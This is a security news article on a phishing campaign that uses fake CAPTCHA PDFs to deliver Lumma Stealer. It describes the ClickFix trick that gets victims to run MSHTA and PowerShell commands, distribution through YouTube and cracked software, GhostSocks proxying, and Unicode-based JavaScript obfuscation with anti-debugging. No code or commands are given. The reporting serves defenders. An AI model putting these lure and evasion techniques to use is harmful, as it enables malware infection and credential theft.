Introduction
Cybersecurity researchers have recently uncovered an extensive phishing campaign exploiting fake CAPTCHA images embedded in PDF documents. These malicious files, hosted on Webflow's content delivery network (CDN), serve as a vehicle for delivering the Lumma Stealer malware. The campaign, which employs search engine optimization (SEO) techniques to lure victims, has targeted thousands of users across multiple sectors globally.
Widespread Distribution of Phishing PDFs
Netskope Threat Labs has identified 260 unique domains hosting over 5,000 phishing PDF files. These documents redirect victims to malicious websites designed to steal sensitive information or install malware. Attackers leverage SEO tactics to ensure their malicious content appears prominently in search engine results, increasing the likelihood of unsuspecting users clicking on them.
Unlike conventional phishing campaigns that primarily target credit card information, this attack incorporates deceptive CAPTCHAs, tricking victims into executing harmful PowerShell commands. This process ultimately leads to the deployment of the Lumma Stealer malware, posing a significant cybersecurity threat.
Impact and Targeted Sectors
Since mid-2024, this phishing operation has affected over 1,150 organizations and compromised more than 7,000 users. The attacks have predominantly targeted victims in North America, Asia, and Southern Europe, with industries such as technology, financial services, and manufacturing being the primary focus.
Analysis of the compromised domains reveals that most phishing PDFs are associated with Webflow, followed by platforms such as GoDaddy, Strikingly, Wix, and Fastly. In an effort to increase their reach, attackers have also uploaded these PDFs to legitimate online repositories, including PDFCOFFEE, PDF4PRO, PDFBean, and the Internet Archive. By embedding fraudulent CAPTCHA images, these PDFs deceive users into clicking malicious links that either steal credit card details or trigger the download of Lumma Stealer.
Execution Tactics and Deceptive Techniques
A notable aspect of this campaign is the attackers' use of a fake CAPTCHA verification page. This page employs a technique known as ClickFix to manipulate victims into executing an MSHTA command. This command subsequently runs a PowerShell script that installs the Lumma Stealer malware onto the victim’s system.
Recent observations indicate that Lumma Stealer is being disseminated under the guise of Roblox games and a cracked version of the Total Commander tool for Windows. YouTube videos, often posted from compromised accounts, serve as another distribution channel, redirecting users to infected websites.
According to cybersecurity firm Silent Push, malicious links and infected files are often embedded within YouTube video descriptions, comments, or direct downloads. As a countermeasure, users are advised to exercise caution when engaging with unverified YouTube content, particularly when prompted to download files or click on external links.
Lumma Stealer's Role in the Cybercrime Ecosystem
Further investigations have revealed that stolen credentials and logs from Lumma Stealer infections are being shared on a relatively new hacking forum, Leaky[.]pro, which emerged in December 2024. Lumma Stealer operates under the malware-as-a-service (MaaS) model, allowing cybercriminals to exploit compromised Windows systems for financial gain.
In early 2024, the malware’s operators introduced an integration with GhostSocks, a proxy malware developed in Golang. This addition enables attackers to utilize a SOCKS5 backconnect feature, enhancing their ability to bypass geographic restrictions and IP-based security measures. Such capabilities are particularly valuable for financial fraud, as they facilitate unauthorized access to high-value targets, including financial institutions.
Emerging Threats and Evolution of Attack Techniques
The recent rise of similar stealer malware, including Vidar and Atomic macOS Stealer (AMOS), demonstrates the continued evolution of cyber threats. These malware variants have been distributed using the ClickFix technique, often exploiting interest in artificial intelligence (AI) tools such as DeepSeek AI chatbot to deceive users.
Additionally, new phishing techniques have been observed involving JavaScript obfuscation with invisible Unicode characters. This method, first documented in October 2024, uses Hangul half-width (U+FFA0) and full-width (U+3164) characters to represent binary values. By converting ASCII characters into these Unicode symbols, attackers effectively evade detection while executing malicious JavaScript payloads.
Juniper Threat Labs has noted that these attacks are highly sophisticated, often incorporating non-public information to personalize phishing attempts. Moreover, the malicious JavaScript is designed to detect debugging attempts and abort execution by redirecting the user to a benign website if any analysis is detected.
Conclusion
The discovery of this phishing campaign highlights the growing complexity of cyber threats and the adaptability of threat actors. By leveraging SEO manipulation, social engineering techniques, and advanced obfuscation methods, attackers are continuously refining their tactics to evade detection. Organizations and individual users must remain vigilant, adopting robust cybersecurity measures such as verifying sources, scrutinizing search engine results, and exercising caution when engaging with online content.
The emergence of platforms like Leaky[.]pro further underscores the importance of proactive threat intelligence and collaboration among cybersecurity professionals to mitigate evolving cyber risks. Staying informed and implementing best practices can help minimize exposure to these ever-growing digital threats.
0 Comments